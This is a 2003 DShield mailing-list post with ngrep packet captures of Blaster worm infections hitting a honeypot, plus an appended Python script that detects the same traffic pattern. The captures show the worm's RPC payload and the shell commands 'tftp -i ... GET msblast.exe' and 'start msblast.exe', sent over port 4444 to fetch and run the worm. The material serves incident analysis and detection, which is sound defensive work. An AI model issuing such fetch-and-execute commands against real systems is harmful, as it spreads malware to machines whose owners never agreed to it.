[Dshield] infocon: yellow

John Sage jsage at finchhaven.com
Mon Aug 11 23:37:16 GMT 2003


Chris:

On Mon, Aug 11, 2003 at 03:01:05PM -0600, Chris Ream wrote:
> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and disassemble
> it to find out exactly what it's doing.

/*
   Posted in reply to an earlier Johannes post, but what the hey...
   This is a Linux firewall with ACK_hole running on 135 and 4444.
   After pushing "MEOW MEOW" down on TCP:135, the attacker assumes
   that he's tftp'ed down msblast.exe to TCP:4444, and then comes back
   a short time later to "start" it..
*/

Here's what one host seems to do:

ngrep_host: src host 12.82.154.207 in snort.log.1060642891
Generated 16:22:28 (TZ -07:00) 08/11/2003

input: snort.log.1060642891
filter: ip and ( src host 12.82.154.207 )
#
T 2003/08/11 16:21:29.473813 12.82.154.207:2406 -> 12.82.140.147:135 [S]
#
T 2003/08/11 16:21:29.723844 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.184005 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
  05 00 0b 03 10 00 00 00    48 00 00 00 7f 00 00 00    ........H.......
  d0 16 d0 16 00 00 00 00    01 00 00 00 01 00 01 00    ................
  a0 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  00 00 00 00 04 5d 88 8a    eb 1c c9 11 9f e8 08 00    .....]..........
  2b 10 48 60 02 00 00 00                               +.H`....        
#
T 2003/08/11 16:21:31.664210 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.704100 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
#
T 2003/08/11 16:21:31.714051 12.82.154.207:2406 -> 12.82.140.147:135 [AF]
#
T 2003/08/11 16:21:31.714092 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.734052 12.82.154.207:2416 -> 12.82.140.147:4444 [S]
#
T 2003/08/11 16:21:32.004072 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
  74 2e 65 78 65 0a                                     t.exe.          
#
T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
  65 0a                                                 e.              
exit


And another:

ngrep_host: src host 12.82.141.200 in snort.log.1060642891
Generated 16:25:10 (TZ -07:00) 08/11/2003

input: snort.log.1060642891
filter: ip and ( src host 12.82.141.200 )
#
T 2003/08/11 16:09:47.092158 12.82.141.200:1070 -> 12.82.140.147:135 [S]
#
T 2003/08/11 16:09:47.552244 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:48.622333 12.82.141.200:1070 -> 12.82.140.147:135 [AP]
  05 00 0b 03 10 00 00 00    48 00 00 00 7f 00 00 00    ........H.......
  d0 16 d0 16 00 00 00 00    01 00 00 00 01 00 01 00    ................
  a0 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  00 00 00 00 04 5d 88 8a    eb 1c c9 11 9f e8 08 00    .....]..........
  2b 10 48 60 02 00 00 00                               +.H`....        
#
T 2003/08/11 16:09:49.162599 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:49.242407 12.82.141.200:1070 -> 12.82.140.147:135 [AP]
#
T 2003/08/11 16:09:49.252459 12.82.141.200:1070 -> 12.82.140.147:135 [AF]
#
T 2003/08/11 16:09:49.252491 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:49.262406 12.82.141.200:1080 -> 12.82.140.147:4444 [S]
#
T 2003/08/11 16:09:49.592427 12.82.141.200:1080 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:09:49.752452 12.82.141.200:1080 -> 12.82.140.147:4444 [AP]
  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 34    tftp -i 12.82.14
  31 2e 32 30 30 20 47 45    54 20 6d 73 62 6c 61 73    1.200 GET msblas
  74 2e 65 78 65 0a                                     t.exe.          
#
T 2003/08/11 16:09:50.102490 12.82.141.200:1080 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:10:10.704598 12.82.141.200:1080 -> 12.82.140.147:4444 [AP]
  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
  65 0a                                                 e.              
exit



- John
-- 
"Obviously, we do not want to leave zombies around."
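
The sequence described in this message (payload to TCP:135, then "tftp ... GET" and "start" on TCP:4444) can be checked for mechanically in ngrep output. The following is an added example, not part of the original post: the function names are hypothetical, the sample is a trimmed excerpt of the first session above, and reading the leading bytes 05 00 0b as a DCE/RPC v5.0 bind is this example's interpretation.

```python
import re
from datetime import datetime

# Trimmed excerpt of the first ngrep session in the post (only short payloads kept).
SAMPLE = """\
T 2003/08/11 16:21:31.184005 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
  05 00 0b 03 10 00 00 00    48 00 00 00 7f 00 00 00    ........H.......
#
T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
  74 2e 65 78 65 0a                                     t.exe.
#
T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
  65 0a                                                 e.
"""

HDR = re.compile(r"^T (\S+ \S+) ([\d.]+):(\d+) -> ([\d.]+):(\d+) \[(\w+)\]")
HEX = r"(?:[0-9a-f]{2} ){0,7}[0-9a-f]{2}"          # one group of up to 8 bytes
ROW = re.compile(rf"^\s+({HEX})(?:\s{{2,6}}({HEX}))?(?:\s|$)")
TFTP = re.compile(rb"tftp -i ([\d.]+) GET (\S+)")

def parse_ngrep(text):
    """Return one dict per packet, with the payload rebuilt from the hex columns."""
    packets = []
    for line in text.splitlines():
        h, r = HDR.match(line), ROW.match(line)
        if h:
            ts = datetime.strptime(h.group(1), "%Y/%m/%d %H:%M:%S.%f")
            packets.append({"ts": ts, "src": h.group(2), "dst": h.group(4),
                            "dport": int(h.group(5)), "data": b""})
        elif r and packets:   # hex row: the ASCII column is never read
            packets[-1]["data"] += bytes.fromhex(r.group(1) + " " + (r.group(2) or ""))
    return packets

def find_blaster_sessions(packets):
    """Flag src->dst pairs with a bind on 135, then tftp GET and start on 4444."""
    state, hits = {}, []
    for p in packets:
        s, d = state.setdefault((p["src"], p["dst"]), {}), p["data"]
        if p["dport"] == 135 and d[:3] == b"\x05\x00\x0b":   # assumed: DCE/RPC bind
            s["bind"] = p["ts"]
        elif p["dport"] == 4444 and "bind" in s:
            m = TFTP.search(d)
            if m:
                s["tftp"], s["file"] = p["ts"], m.group(2).decode()
                # The command tells the target to fetch from the sender itself.
                s["pull_from_src"] = m.group(1).decode() == p["src"]
            elif "tftp" in s and d.strip() == b"start " + s["file"].encode():
                delay = (p["ts"] - s["tftp"]).total_seconds()
                hits.append({"src": p["src"], "dst": p["dst"], "file": s["file"],
                             "pull_from_src": s["pull_from_src"],
                             "delay_s": round(delay, 1)})
    return hits

if __name__ == "__main__":
    for hit in find_blaster_sessions(parse_ngrep(SAMPLE)):
        print(hit)
```
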



